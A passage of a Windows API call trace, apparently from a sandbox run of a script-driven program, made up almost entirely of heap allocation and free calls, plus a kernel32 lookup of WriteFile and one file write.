hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6998e0 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0075.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.101] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.101] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690970 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.101] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906b0 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690930 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ae80 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.103] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0075.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.107] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76e120 [0075.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e120, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.107] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.108] WriteFile (in: hFile=0x140, lpBuffer=0x6a0b20*, nNumberOfBytesToWrite=0x329b, lpNumberOfBytesWritten=0x61e598, lpOverlapped=0x0 | out: lpBuffer=0x6a0b20*, lpNumberOfBytesWritten=0x61e598*=0x329b, lpOverlapped=0x0) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.108] HeapFree (in: hHeap=0x650000, 